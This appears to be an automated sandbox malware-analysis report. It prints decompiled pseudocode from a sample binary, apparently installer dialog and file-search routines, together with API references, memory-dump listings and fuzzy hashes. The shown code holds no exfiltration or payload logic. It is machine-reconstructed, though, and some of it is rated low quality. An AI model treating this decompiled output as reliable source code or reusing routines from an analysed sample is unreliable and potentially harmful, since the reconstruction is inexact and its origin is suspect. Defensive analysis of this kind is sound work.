                                                                    0x00402139
                                                                    0x0040213c
                                                                    0x00402149
                                                                    0x0040214b
                                                                    0x0040214d
                                                                    0x00402154
                                                                    0x00402157
                                                                    0x00402157
                                                                    0x0040215a
                                                                    0x00402164
                                                                    0x0040216c
                                                                    0x00402171
                                                                    0x0040217d
                                                                    0x0040217d
                                                                    0x00402180
                                                                    0x00402189
                                                                    0x0040218c
                                                                    0x00402195
                                                                    0x0040219a
                                                                    0x004021ac
                                                                    0x004021b5
                                                                    0x004021bb
                                                                    0x004021c7
                                                                    0x004021c7
                                                                    0x004021c9
                                                                    0x004021cf
                                                                    0x004021cf
                                                                    0x004021d2
                                                                    0x004021d8
                                                                    0x004021dd
                                                                    0x004021f2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004021dd
                                                                    0x004021e8
                                                                    0x00402932
                                                                    0x0040293e

                                                                    APIs
                                                                    • CoCreateInstance.OLE32(00407324,?,00000001,00407314,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020F9
                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409418,00000400,?,00000001,00407314,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021B5
                                                                    Strings
                                                                    • C:\Users\user\AppData\Local\Temp, xrefs: 00402131
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ByteCharCreateInstanceMultiWide
                                                                    • String ID: C:\Users\user\AppData\Local\Temp
                                                                    • API String ID: 123533781-501415292
                                                                    • Opcode ID: 751c6343f30b53ff87cb2a36cb9a8fc5fe581f53ea8e30dae2934d6634253110
                                                                    • Instruction ID: 6da020dad1963d07c1d5d6cba7c730fbb78a3e39a4a6f028781d9f3b25516250
                                                                    • Opcode Fuzzy Hash: 751c6343f30b53ff87cb2a36cb9a8fc5fe581f53ea8e30dae2934d6634253110
                                                                    • Instruction Fuzzy Hash: 0D417D75A00215BFCB00DFA8CD88E9E7BB6FF89315B20416AF905EB2D1CA759D41CB64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004026BC, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 39%
                                                                    			E004026BC(char __ebx, CHAR* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A9A(2), _t19 - 0x1a4) != 0xffffffff) {
					E0040591D(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E004059BF();
				} else {
					 *((char*)(__edi)) = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                                    0x004026d4
                                                                    0x004026e8
                                                                    0x004026f3
                                                                    0x004026f4
                                                                    0x00402855
                                                                    0x004026d6
                                                                    0x004026d6
                                                                    0x004026d8
                                                                    0x004026da
                                                                    0x004026da
                                                                    0x00402932
                                                                    0x0040293e

                                                                    APIs
                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004026CB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileFindFirst
                                                                    • String ID:
                                                                    • API String ID: 1974802433-0
                                                                    • Opcode ID: 9223db83c99603c3289ccd37b6b2a6db7d53f2a3e2294c42d49ba21f7ea334b2
                                                                    • Instruction ID: fa0b3d5524a7ec5f3b356c4eb27d29c110ff1bfb4a1b37a6377ddf9626cce4e3
                                                                    • Opcode Fuzzy Hash: 9223db83c99603c3289ccd37b6b2a6db7d53f2a3e2294c42d49ba21f7ea334b2
                                                                    • Instruction Fuzzy Hash: EBF0A0B2608110DBE701EBA49E49AEEB768DF52324F60417BE141B20C1D6B84A44DA2A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 025B187C, Relevance: .0, Instructions: 33COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.216143504.00000000025B0000.00000040.00000001.sdmp, Offset: 025B0000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                                                    • Instruction ID: 5ded59ec7c3e3930983a50623626a4016a40ad7649fcbdb49d67bc9d563a36bf
                                                                    • Opcode Fuzzy Hash: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                                                    • Instruction Fuzzy Hash: 54014C79E10608EFCB81DF98C58099DBBF5FF08260B108495E808EB711D330AE509B44
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 025B1664, Relevance: .0, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.216143504.00000000025B0000.00000040.00000001.sdmp, Offset: 025B0000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                    • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                                    • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                    • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004038BF, Relevance: 46.8, APIs: 31, Instructions: 347windowstringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 77%
                                                                    			E004038BF(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				signed int _t35;
				struct HWND__* _t37;
				struct HWND__* _t47;
				struct HWND__* _t65;
				struct HWND__* _t71;
				struct HWND__* _t84;
				struct HWND__* _t89;
				struct HWND__* _t97;
				int _t101;
				int _t104;
				struct HWND__* _t117;
				struct HWND__* _t120;
				signed int _t122;
				struct HWND__* _t127;
				long _t132;
				int _t134;
				int _t135;
				struct HWND__* _t136;
				void* _t139;

				_t135 = _a8;
				if(_t135 == 0x110 || _t135 == 0x408) {
					_t33 = _a12;
					_t117 = _a4;
					__eflags = _t135 - 0x110;
					 *0x79f56c = _t33;
					if(_t135 == 0x110) {
						 *0x7a2f84 = _t117;
						 *0x79f57c = GetDlgItem(_t117, 1);
						_t89 = GetDlgItem(_t117, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x79e548 = _t89;
						E00403DA7(_t117);
						SetClassLongA(_t117, 0xfffffff2,  *0x7a2768);
						 *0x7a274c = E00401410(4);
						_t33 = 1;
						__eflags = 1;
						 *0x79f56c = 1;
					}
					_t120 =  *0x409284; // 0xffffffff
					_t132 = (_t120 << 6) +  *0x7a2fa0;
					__eflags = _t120;
					if(_t120 < 0) {
						L38:
						E00403DF3(0x40b);
						while(1) {
							_t35 =  *0x79f56c;
							 *0x409284 =  *0x409284 + _t35;
							_t132 = _t132 + (_t35 << 6);
							_t37 =  *0x409284; // 0xffffffff
							__eflags = _t37 -  *0x7a2fa4;
							if(_t37 ==  *0x7a2fa4) {
								E00401410(1);
							}
							__eflags =  *0x7a274c;
							if( *0x7a274c != 0) {
								break;
							}
							__eflags =  *0x409284 -  *0x7a2fa4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_push( *((intOrPtr*)(_t132 + 0x24)));
							_t122 =  *(_t132 + 0x14);
							_push(0x7ab000);
							E004059E1(_t117, _t122, _t132);
							_push( *((intOrPtr*)(_t132 + 0x20)));
							_push(0xfffffc19);
							E00403DA7(_t117);
							_push( *((intOrPtr*)(_t132 + 0x1c)));
							_push(0xfffffc1b);
							E00403DA7(_t117);
							_push( *((intOrPtr*)(_t132 + 0x28)));
							_push(0xfffffc1a);
							E00403DA7(_t117);
							_t47 = GetDlgItem(_t117, 3);
							__eflags =  *0x7a300c;
							_t136 = _t47;
							if( *0x7a300c != 0) {
								_t122 = _t122 & 0x0000fefd | 0x00000004;
								__eflags = _t122;
							}
							ShowWindow(_t136, _t122 & 0x00000008);
							EnableWindow(_t136, _t122 & 0x00000100);
							E00403DC9(_t122 & 0x00000002);
							EnableWindow( *0x79e548, _t122 & 0x00000004);
							SendMessageA(_t136, 0xf4, 0, 1);
							__eflags =  *0x7a300c;
							if( *0x7a300c == 0) {
								_push( *0x79f57c);
							} else {
								SendMessageA(_t117, 0x401, 2, 0);
								_push( *0x79e548);
							}
							E00403DDC();
							E004059BF(0x79f580, 0x7a2780);
							_push( *((intOrPtr*)(_t132 + 0x18)));
							_push( &(0x79f580[lstrlenA(0x79f580)]));
							E004059E1(_t117, 0, _t132);
							SetWindowTextA(_t117, 0x79f580);
							_push(0);
							_t65 = E0040136D( *((intOrPtr*)(_t132 + 8)));
							__eflags = _t65;
							if(_t65 != 0) {
								continue;
							} else {
								__eflags =  *_t132 - _t65;
								if( *_t132 == _t65) {
									continue;
								}
								__eflags =  *(_t132 + 4) - 5;
								if( *(_t132 + 4) != 5) {
									DestroyWindow( *0x7a2758);
									 *0x79ed58 = _t132;
									__eflags =  *_t132;
									if( *_t132 > 0) {
										_t71 = CreateDialogParamA( *0x7a2f80,  *_t132 +  *0x7a2760 & 0x0000ffff, _t117,  *(0x409288 +  *(_t132 + 4) * 4), _t132);
										__eflags = _t71;
										 *0x7a2758 = _t71;
										if(_t71 != 0) {
											_push( *((intOrPtr*)(_t132 + 0x2c)));
											_push(6);
											E00403DA7(_t71);
											GetWindowRect(GetDlgItem(_t117, 0x3fa), _t139 + 0x10);
											ScreenToClient(_t117, _t139 + 0x10);
											SetWindowPos( *0x7a2758, 0,  *(_t139 + 0x20),  *(_t139 + 0x20), 0, 0, 0x15);
											_push(0);
											E0040136D( *((intOrPtr*)(_t132 + 0xc)));
											ShowWindow( *0x7a2758, 8);
											E00403DF3(0x405);
										}
									}
									goto L58;
								}
								__eflags =  *0x7a300c - _t65;
								if( *0x7a300c != _t65) {
									goto L61;
								}
								__eflags =  *0x7a3000 - _t65;
								if( *0x7a3000 != _t65) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x7a2758);
						 *0x7a2f84 =  *0x7a2f84 & 0x00000000;
						__eflags =  *0x7a2f84;
						EndDialog(_t117,  *0x79e950);
						goto L58;
					} else {
						__eflags = _t33 - 1;
						if(_t33 != 1) {
							L37:
							__eflags =  *_t132;
							if( *_t132 == 0) {
								goto L61;
							}
							goto L38;
						}
						_push(0);
						_t84 = E0040136D( *((intOrPtr*)(_t132 + 0x10)));
						__eflags = _t84;
						if(_t84 == 0) {
							goto L37;
						}
						SendMessageA( *0x7a2758, 0x40f, 0, 1);
						__eflags =  *0x7a274c;
						return 0 |  *0x7a274c == 0x00000000;
					}
				} else {
					_t117 = _a4;
					if(_t135 == 0x47) {
						SetWindowPos( *0x79f560, _t117, 0, 0, 0, 0, 0x13);
					}
					if(_t135 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x79f560,  ~(_a12 - 1) & _t135);
					}
					if(_t135 != 0x40d) {
						__eflags = _t135 - 0x11;
						if(_t135 != 0x11) {
							__eflags = _t135 - 0x10;
							if(_t135 != 0x10) {
								L14:
								__eflags = _t135 - 0x111;
								if(_t135 != 0x111) {
									L30:
									return E00403E0E(_t135, _a12, _a16);
								}
								_t134 = _a12 & 0x0000ffff;
								_t127 = GetDlgItem(_t117, _t134);
								__eflags = _t127;
								if(_t127 == 0) {
									L17:
									__eflags = _t134 - 1;
									if(_t134 != 1) {
										__eflags = _t134 - 3;
										if(_t134 != 3) {
											__eflags = _t134 - 2;
											if(_t134 != 2) {
												L29:
												SendMessageA( *0x7a2758, 0x111, _a12, _a16);
												goto L30;
											}
											__eflags =  *0x7a300c;
											if( *0x7a300c == 0) {
												_t97 = E00401410(3);
												__eflags = _t97;
												if(_t97 != 0) {
													goto L30;
												}
												 *0x79e950 = 1;
												L25:
												_push(0x78);
												L26:
												E00403D80();
												goto L30;
											}
											E00401410(_t134);
											 *0x79e950 = _t134;
											goto L25;
										}
										__eflags =  *0x409284;
										if( *0x409284 <= 0) {
											goto L29;
										}
										_push(0xffffffff);
										goto L26;
									}
									_push(1);
									goto L26;
								}
								SendMessageA(_t127, 0xf3, 0, 0);
								_t101 = IsWindowEnabled(_t127);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L61;
								}
								goto L17;
							}
							__eflags =  *0x409284 -  *0x7a2fa4 - 1; // 0xffffffff
							if(__eflags != 0) {
								goto L30;
							}
							_t104 = IsWindowEnabled( *0x79e548);
							__eflags = _t104;
							if(_t104 != 0) {
								goto L30;
							}
							_t135 = 0x111;
							_a12 = 1;
							goto L14;
						}
						SetWindowLongA(_t117, 0, 0);
						return 1;
					} else {
						DestroyWindow( *0x7a2758);
						 *0x7a2758 = _a12;
						L58:
						if( *0x7a0580 == 0 &&  *0x7a2758 != 0) {
							ShowWindow(_t117, 0xa);
							 *0x7a0580 = 1;
						}
						L61:
						return 0;
					}
				}
			}




























                                                                    0x004038c9
                                                                    0x004038d1
                                                                    0x00403a4a
                                                                    0x00403a4e
                                                                    0x00403a52
                                                                    0x00403a54
                                                                    0x00403a59
                                                                    0x00403a64
                                                                    0x00403a6f
                                                                    0x00403a74
                                                                    0x00403a76
                                                                    0x00403a78
                                                                    0x00403a7b
                                                                    0x00403a80
                                                                    0x00403a8e
                                                                    0x00403a9b
                                                                    0x00403aa2
                                                                    0x00403aa2
                                                                    0x00403aa3
                                                                    0x00403aa3
                                                                    0x00403aa8
                                                                    0x00403ab5
                                                                    0x00403abb
                                                                    0x00403abd
                                                                    0x00403afd
                                                                    0x00403b02
                                                                    0x00403b07
                                                                    0x00403b07
                                                                    0x00403b0c
                                                                    0x00403b15
                                                                    0x00403b17
                                                                    0x00403b1c
                                                                    0x00403b22
                                                                    0x00403b26
                                                                    0x00403b26
                                                                    0x00403b2b
                                                                    0x00403b32
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403b3d
                                                                    0x00403b43
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403b49
                                                                    0x00403b4c
                                                                    0x00403b4f
                                                                    0x00403b54
                                                                    0x00403b59
                                                                    0x00403b5c
                                                                    0x00403b62
                                                                    0x00403b67
                                                                    0x00403b6a
                                                                    0x00403b70
                                                                    0x00403b75
                                                                    0x00403b78
                                                                    0x00403b7e
                                                                    0x00403b86
                                                                    0x00403b8c
                                                                    0x00403b93
                                                                    0x00403b95
                                                                    0x00403b9c
                                                                    0x00403b9c
                                                                    0x00403b9c
                                                                    0x00403ba6
                                                                    0x00403bb5
                                                                    0x00403bc1
                                                                    0x00403bd0
                                                                    0x00403be7
                                                                    0x00403be9
                                                                    0x00403bef
                                                                    0x00403c04
                                                                    0x00403bf1
                                                                    0x00403bfa
                                                                    0x00403bfc
                                                                    0x00403bfc
                                                                    0x00403c0a
                                                                    0x00403c1a
                                                                    0x00403c1f
                                                                    0x00403c2a
                                                                    0x00403c2b
                                                                    0x00403c32
                                                                    0x00403c38
                                                                    0x00403c3c
                                                                    0x00403c41
                                                                    0x00403c43
                                                                    0x00000000
                                                                    0x00403c49
                                                                    0x00403c49
                                                                    0x00403c4b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403c51
                                                                    0x00403c55
                                                                    0x00403c7a
                                                                    0x00403c80
                                                                    0x00403c86
                                                                    0x00403c89
                                                                    0x00403caf
                                                                    0x00403cb5
                                                                    0x00403cb7
                                                                    0x00403cbc
                                                                    0x00403cc2
                                                                    0x00403cc5
                                                                    0x00403cc8
                                                                    0x00403cdf
                                                                    0x00403ceb
                                                                    0x00403d06
                                                                    0x00403d0c
                                                                    0x00403d10
                                                                    0x00403d1d
                                                                    0x00403d28
                                                                    0x00403d28
                                                                    0x00403cbc
                                                                    0x00000000
                                                                    0x00403c89
                                                                    0x00403c57
                                                                    0x00403c5d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403c63
                                                                    0x00403c69
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403c6f
                                                                    0x00403c43
                                                                    0x00403d35
                                                                    0x00403d41
                                                                    0x00403d41
                                                                    0x00403d49
                                                                    0x00000000
                                                                    0x00403abf
                                                                    0x00403abf
                                                                    0x00403ac2
                                                                    0x00403af5
                                                                    0x00403af5
                                                                    0x00403af7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403af7
                                                                    0x00403ac4
                                                                    0x00403ac8
                                                                    0x00403acd
                                                                    0x00403acf
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403adf
                                                                    0x00403ae7
                                                                    0x00000000
                                                                    0x00403aed
                                                                    0x004038e3
                                                                    0x004038e3
                                                                    0x004038ea
                                                                    0x004038fb
                                                                    0x004038fb
                                                                    0x00403904
                                                                    0x0040390d
                                                                    0x00403918
                                                                    0x00403918
                                                                    0x00403924
                                                                    0x00403940
                                                                    0x00403943
                                                                    0x00403958
                                                                    0x0040395b
                                                                    0x00403990
                                                                    0x00403990
                                                                    0x00403996
                                                                    0x00403a37
                                                                    0x00000000
                                                                    0x00403a40
                                                                    0x0040399c
                                                                    0x004039af
                                                                    0x004039b1
                                                                    0x004039b3
                                                                    0x004039d0
                                                                    0x004039d3
                                                                    0x004039d5
                                                                    0x004039da
                                                                    0x004039dd
                                                                    0x004039ec
                                                                    0x004039ef
                                                                    0x00403a22
                                                                    0x00403a35
                                                                    0x00000000
                                                                    0x00403a35
                                                                    0x004039f1
                                                                    0x004039f8
                                                                    0x00403a11
                                                                    0x00403a16
                                                                    0x00403a18
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403a1a
                                                                    0x00403a06
                                                                    0x00403a06
                                                                    0x00403a08
                                                                    0x00403a08
                                                                    0x00000000
                                                                    0x00403a08
                                                                    0x004039fb
                                                                    0x00403a00
                                                                    0x00000000
                                                                    0x00403a00
                                                                    0x004039df
                                                                    0x004039e6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004039e8
                                                                    0x00000000
                                                                    0x004039e8
                                                                    0x004039d7
                                                                    0x00000000
                                                                    0x004039d7
                                                                    0x004039bf
                                                                    0x004039c2
                                                                    0x004039c8
                                                                    0x004039ca
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004039ca
                                                                    0x00403963
                                                                    0x00403969
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403975
                                                                    0x0040397b
                                                                    0x0040397d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403983
                                                                    0x00403988
                                                                    0x00000000
                                                                    0x00403988
                                                                    0x0040394a
                                                                    0x00000000
                                                                    0x00403926
                                                                    0x0040392c
                                                                    0x00403936
                                                                    0x00403d4f
                                                                    0x00403d56
                                                                    0x00403d64
                                                                    0x00403d6a
                                                                    0x00403d6a
                                                                    0x00403d74
                                                                    0x00000000
                                                                    0x00403d74
                                                                    0x00403924

                                                                    APIs
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004038FB
                                                                    • ShowWindow.USER32(?), ref: 00403918
                                                                    • DestroyWindow.USER32 ref: 0040392C
                                                                    • SetWindowLongA.USER32 ref: 0040394A
                                                                    • IsWindowEnabled.USER32 ref: 00403975
                                                                    • GetDlgItem.USER32 ref: 004039A3
                                                                    • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 004039BF
                                                                    • IsWindowEnabled.USER32(00000000), ref: 004039C2
                                                                    • GetDlgItem.USER32 ref: 00403A6A
                                                                    • GetDlgItem.USER32 ref: 00403A74
                                                                    • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403A8E
                                                                    • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403ADF
                                                                    • GetDlgItem.USER32 ref: 00403B86
                                                                    • ShowWindow.USER32(00000000,?), ref: 00403BA6
                                                                    • EnableWindow.USER32(00000000,?), ref: 00403BB5
                                                                    • EnableWindow.USER32(?,?), ref: 00403BD0
                                                                    • SendMessageA.USER32(00000000,000000F4,00000000,00000001), ref: 00403BE7
                                                                    • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403BFA
                                                                    • lstrlenA.KERNEL32(0079F580,?,0079F580,007A2780), ref: 00403C23
                                                                    • SetWindowTextA.USER32(?,0079F580), ref: 00403C32
                                                                    • ShowWindow.USER32(?,0000000A), ref: 00403D64
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Window$ItemMessageSend$Show$EnableEnabledLong$ClassDestroyTextlstrlen
                                                                    • String ID:
                                                                    • API String ID: 3950083612-0
                                                                    • Opcode ID: fa4e3fe4f8128de32ab5ebeb5ac9453328a33fd8f116c2f1de342d397e391704
                                                                    • Instruction ID: 5dd3c4f218cf3e404d6a97a2e5ce8d1cdd0b8388a563f9de6f37f2f8e87629b5
                                                                    • Opcode Fuzzy Hash: fa4e3fe4f8128de32ab5ebeb5ac9453328a33fd8f116c2f1de342d397e391704
                                                                    • Instruction Fuzzy Hash: 9DC1CC70904200AFD720AF25ED45E277FADEB89706F00453AF641B52F2D67DAA42CB1D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00403EEF, Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 204windowstringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 92%
                                                                    			E00403EEF(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x79f568 =  *0x79f568 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403E0E(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x7a1f20;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x7a2f84, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x7a2f84, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x79f568 != 0) {
						goto L25;
					} else {
						_t112 =  *0x79ed58 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403DC9(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E0040417A();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x7a275c - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x7a2fb8;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403EBB;
				E00403DA7(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403DA7(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403DC9( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403DDC(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x7a2f88 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x79e54c =  *0x79e54c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x79f568 =  *0x79f568 & 0x00000000;
				return 0;
			}

















                                                                    0x00403eff
                                                                    0x00404025
                                                                    0x00404081
                                                                    0x00404085
                                                                    0x0040415c
                                                                    0x0040415e
                                                                    0x0040415e
                                                                    0x00404164
                                                                    0x00404164
                                                                    0x00404167
                                                                    0x00000000
                                                                    0x0040416e
                                                                    0x00404093
                                                                    0x00404095
                                                                    0x0040409f
                                                                    0x004040aa
                                                                    0x004040ad
                                                                    0x004040b0
                                                                    0x004040bb
                                                                    0x004040be
                                                                    0x004040c5
                                                                    0x004040d3
                                                                    0x004040eb
                                                                    0x004040fe
                                                                    0x0040410e
                                                                    0x00404110
                                                                    0x00404110
                                                                    0x004040c5
                                                                    0x0040411a
                                                                    0x00000000
                                                                    0x00404125
                                                                    0x00404129
                                                                    0x0040413a
                                                                    0x0040413a
                                                                    0x00404140
                                                                    0x0040414e
                                                                    0x0040414e
                                                                    0x00000000
                                                                    0x00404152
                                                                    0x0040411a
                                                                    0x00404030
                                                                    0x00000000
                                                                    0x00404044
                                                                    0x0040404a
                                                                    0x00404050
                                                                    0x00000000
                                                                    0x00000000
